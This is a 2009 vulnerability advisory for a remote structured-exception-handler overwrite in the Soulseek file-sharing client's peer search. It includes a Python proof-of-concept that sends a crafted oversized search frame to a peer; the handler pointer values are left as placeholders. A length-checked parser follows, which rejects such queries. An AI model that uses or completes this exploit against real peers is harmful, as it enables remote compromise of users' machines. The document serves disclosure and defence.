Soulseek 157 NS 13e 156.* Remote Peer Search Code Execution
By Laurent Gaffié blog, on [2009-07-03] at 07:01:53
Soulseek 157 NS 13e and 156.* Remote Peer Search Code Execution
=============================================
- Release date: July 02, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS 13e and 156.* Remote Peer Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application. One of the things that makes Soulseek(tm) unique is our community and community-related features. Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private. Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!"

III. DESCRIPTION
-------------------------
The Soulseek client allows direct peer file search, letting a user look for the files he wants directly on the peer's computer. Unfortunately this feature is vulnerable to a remote SEH overwrite: an over-long search query sent to the peer overwrites the Structured Exception Handler chain on the stack.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept targets a user called 123yow123. The script is Python 2 as published; the backslashes of the escape sequences were lost when the page was scraped and are restored here, but the two pointer values passed to struct.pack() did not survive extraction and are left as named placeholders.

import struct
import sys, socket
from time import *

ip = "IP_ADDR"
port = "PORT_NUM"  # You can find out, how to find out IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
except:
    print "Can't connect to peer! "
    sys.exit(0)

# Filler that reaches the SEH record, then the two overwritten pointers.
junk = "\x41" * 3084
next_seh = struct.pack('<L', NEXT_SEH_ADDR)  # value not recoverable from the page; '<L' and the name are placeholders
seh = struct.pack('<L', SEH_ADDR)            # value not recoverable from the page; placeholder
other_junk = "\x61" * 1424

# Peer init frame (length 0x17, code 1, user "123yow123", type "P", token),
# followed by the search request frame (length 0x0c21, code 8, token, query of 0x0c15 bytes).
buffer = "\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer += "\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00\x21\x0c\x00\x00\x08"
buffer += "\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00" + junk + next_seh + seh + other_junk
s.send(buffer)

After the query is sent, the SEH handler is overwritten.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client prior to 157 NS 13e.

VI. SYSTEMS AFFECTED
-------------------------
Windows, all versions

VII. SOLUTION
-------------------------
Upgrade to 157 NS 13e (http://slsknet.org/download.html)

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
July 02, 2009

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

XII. PERSONAL NOTES
------------------------
The Soulseek team patched this bug a month ago; a distributed message urging users to upgrade their Soulseek client has been sent for a month now, and not many users still use vulnerable Soulseek versions.

@to the one who likes to rip bugs and make an exploit "universal" for fame, just make sure it's at least universal before you say so. For the others: http://www.youtube.com/watch?v=tVACUjHn6yU :)

@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html
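The root cause described in section III is a search query whose claimed length is trusted and copied into a fixed-size stack buffer. The following added example (my own code, not the advisory's or Soulseek's) shows what a receiving client should do instead: parse the length-prefixed framing with every length checked against both a cap and the bytes actually received, and drop the message rather than copy it. The layout (u32 frame length, u32 message code, u32 token, u32-prefixed query string) and the meaning of code 8 as a peer search request are inferred from the PoC bytes above and are assumptions; the 512-byte cap and the sample token are constructed for the example.

```python
import struct

# Assumed cap on a single search query; a real client would pick its own bound.
MAX_QUERY_LEN = 512


class MalformedMessage(ValueError):
    """A frame or field that violates the length rules; the message is dropped, not copied."""


def _u32(buf, off):
    """Read a little-endian u32 at off, refusing to read past the end of buf."""
    if off + 4 > len(buf):
        raise MalformedMessage("truncated u32 at offset %d" % off)
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _string(buf, off, max_len):
    """Read a u32-length-prefixed string; the claimed length must fit both the cap and the buffer."""
    n, off = _u32(buf, off)
    if n > max_len:
        raise MalformedMessage("string of %d bytes exceeds cap of %d" % (n, max_len))
    if off + n > len(buf):
        raise MalformedMessage("string of %d bytes runs past end of frame" % n)
    return buf[off:off + n], off + n


def split_frames(data):
    """Return (code, payload) for each frame: u32 length, then u32 code, then payload."""
    frames = []
    off = 0
    while off < len(data):
        length, off = _u32(data, off)
        if length < 4 or off + length > len(data):
            raise MalformedMessage("frame length %d does not fit in %d remaining bytes"
                                   % (length, len(data) - off))
        code = struct.unpack_from("<I", data, off)[0]
        frames.append((code, data[off + 4:off + length]))
        off += length
    return frames


def parse_search_request(payload, max_len=MAX_QUERY_LEN):
    """Parse a peer search request payload (assumed layout: u32 token, string query)."""
    token, off = _u32(payload, 0)
    query, off = _string(payload, off, max_len)
    if off != len(payload):
        raise MalformedMessage("%d trailing bytes after query" % (len(payload) - off))
    return token, query.decode("utf-8", "replace")


def build_search_request(token, query):
    """Build a search frame in the same assumed layout; used here only to make sample input."""
    q = query.encode("utf-8")
    body = struct.pack("<II", 8, token) + struct.pack("<I", len(q)) + q
    return struct.pack("<I", len(body)) + body


def handle(data, max_len=MAX_QUERY_LEN):
    """Return ("ok", [(token, query), ...]) or ("rejected", reason) for a received byte stream."""
    try:
        results = []
        for code, payload in split_frames(data):
            if code == 8:  # search request, as assumed from the PoC bytes
                results.append(parse_search_request(payload, max_len))
        return ("ok", results)
    except MalformedMessage as exc:
        return ("rejected", str(exc))


# Constructed sample input: a benign query, and one whose claimed length
# (3093 bytes, the query size in the advisory's PoC) exceeds the cap.
SAMPLE_TOKEN = 0x0C1D7B6C
BENIGN = build_search_request(SAMPLE_TOKEN, "some song")
OVERSIZED = build_search_request(SAMPLE_TOKEN, "A" * 3093)

if __name__ == "__main__":
    print(handle(BENIGN))     # ('ok', [(203520876, 'some song')])
    print(handle(OVERSIZED))  # ('rejected', 'string of 3093 bytes exceeds cap of 512')
```

The cap is checked before any copy happens, and the frame length is checked against the bytes actually received, so a query that claims more than the buffer holds is refused at parse time instead of being written past a stack buffer. A truncated frame is also rejected rather than read out of bounds.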